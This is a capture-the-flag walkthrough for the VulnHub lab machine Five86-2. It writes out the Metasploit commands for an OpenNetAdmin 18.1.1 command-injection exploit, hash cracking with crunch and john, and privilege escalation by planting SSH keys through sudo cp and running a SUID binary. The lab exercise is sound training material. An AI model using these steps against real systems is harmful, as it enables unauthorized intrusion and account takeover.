Today we are sharing another CTF walkthrough of the
vulnhub machine named Five86-2 with the intent of gaining experience in the
world of penetration testing. The credit goes to m0tl3ycr3w and syed umar for
design this machine and the level is set to beginner to advanced.
According to author:
The ultimate goal of this challenge is to get
root and to read the one and only flag.
Linux skills and
familiarity with the Linux command line are a must, as is some experience with
basic penetration testing tools.
Penetration
Testing Methodologies
Network scaning
·
Netdiscover
·
Nmap
Enuemration
·
Exploring Http
services
Exploit OpenNetAdmin
·
Command Injection
(Metasploit)
·
Crack the hashes
(john)
Privilege Escalation
·
Abousing Sudo
·
Abusing SUID
Walkthrough
Network Scanning
As you know, this is the
initial phase where we choose netdiscover for network scan for identifying host
IP and this we have 192.168.0.126 as our host IP.
In our next step, we love to use nmap for network ports
enumeration, thus we run the following command and found port 80 is open for
HTTP, moreover we also found robots.txt displaying disallow entry for /ona as
shown in the below image.
Enumeration
Thus, we navigate to web browser and browse the following
URL and found open network admin application is running on the web server and
disclosing application installed version.
As we notice that the openNetAdmin 18.1.1 version is
installed on the host machine, so we explored for its exploit and found
ruby script for Metasploit available to Exploit
DB to abuse OpenNetAdmin against command injection. Without wasting time,
we download a malicious file from our local machine.
Further we copied the download ruby inside the Metasploit
framework to use the module for exploit the host machine against its
vulnerability.
Exploit
After coping the exploit inside Metasploit Framework, you
will need to reload the database and load the module.
Here we got our meterpreter session after running
following commands:
use exploit 47772
set rhosts 192.168.0.126
set lhost 192.168.0.132
exploit
So, we successfully exploited the host machine and spawned
the shell as www-data, we decided to go with post enumeration for privilege
escalation and as a result, we found the “.htaccess” file from within /var/www/html/reports.
By reading the .htaccess we found path for .htpasswd file i.e.
“/var/www/.htpasswd” , and by reading .htapasswd file we found hashes for user
“douglas”. In the .htapsswd file, author has left a hint for the password as
shown in the image.
So, we found that the password is a 10-character
"aefhrt" string, so you'll need to prepare a 10-character long
password dictionary. Here we use crunch to create the dictionary and execute
the following command to follow the pattern of the password as the author has
said.
crunch 10 10 aefhrt > dict.txt
With the help of the above command, we generated a
dictionary and used the john ripper to crack the hash value. Here I saved the
hash value described above in a text file called "hash" and used
dict.txt wordlist to crack the hash value and run the following command.
john –wordlist=/root/dict.txt hash
As result we found password: “fatherrrr” for the given hash
value.
Privilege Escalation
As we spawned the host machine shell, we try to switch as
duglas by using the password cracked above. When we signed in as
duglass, we searched for the sudo rights for him and found that he could use
the copy program as "jen."
Since author has given sudo right on copy program which
could be executed as jen hence we can copy the ssh public rsa_key of douglas
inside /home/jen/.ssh so that we can logged as jen. Thus, we executed the
following commands as given below.
cat id_rsa.pub > /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh
Now copy id_rsa in the /tmp directory and change the
permission then try to access ssh shell on localhost as jen.
cd .ssh
cp id_rsa /tmp
cd /tmp
chmod 600 id_rsa
ssh -i id_rsa jen@127.0.0.1
Hmmm! As we connected to the ssh shell as jen we found
another hint “you have a new mail” on the ssh banner as shown in the
given image.
So, we find a text file "jen" in / var / mails
that shows a jen email. As per this message jen knows the password for the Moss
account, so we can use the Moss credential for a further move.
So, switched from jen's account to Moss and identified for
SUID enabled directories, luckily here we found that the sticky bit is enabled
for "upyourgame" as shown in the image.
find / -perm -u=s -type f 2>/dev/null
cd .game
./upyourgame
So we navigate to /home/Moss/.game/ and run the
"upyourgame" program, the program launches questionnaires that are
only answerable in the YES / NO format, and finally we get the root shell and
find the final flag in the /root directory as shown below.
0 comments:
Post a Comment